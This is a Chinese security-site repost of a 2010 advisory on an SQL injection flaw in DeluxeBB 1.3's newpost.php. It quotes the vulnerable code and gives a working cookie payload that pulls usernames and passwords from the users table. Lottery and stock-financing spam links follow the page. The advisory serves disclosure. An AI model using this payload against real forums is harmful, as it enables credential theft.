歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

DeluxeBB 1.3 newpost.php頁面SQL注入漏洞

來源:本站轉載 作者:佚名 時間:2010-05-12 TAG: 我要投稿
DeluxeBB是一款基于PHP的論壇程序。 

DeluxeBB的newpost.php頁面沒有正確地過濾用戶所提交的SQL查詢參數: 

//inserting thread 
$db->unbuffered_query("INSERT INTO ".$prefix."threads VALUES (NULL, ’$info[fid]’, ’".$_COOKIE[’memberid’]."’, ’$subject’, ’$posticon’, ’0’, ’0’, ’$lock’, ’$pin’, ’0’, ’".htmlspecialchars($_COOKIE[’membercookie’])."’, ’$time’)"); 
$tid = $db->insert_id(); 

Cookie變量memberid直接在SQL查詢中使用,如果關閉了magic_quotes_gpc的話就會導致SQL注入攻擊。必須將 membercookie變量設置為Guest才可以利用這個漏洞,否則無法繞過之前的檢查。 

測試代碼: 

membercookie=guest 
memberid=xx’,(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),’none’,0,0,0,0,0,’guest’,’1269081154’)+--+x 

目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本: 

http://www.deluxebb.com 
【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 股票涨跌由什么人决定 股票融资融券是什么意思 必中pk10全能计划 广西11选5现在走势图 时时彩自动投注软件 安徽11选5一定牛遗漏 广东福利彩票快乐十分奖金 东莞配资公司 广东11选五走势图一定牛 上海时时乐最新开奖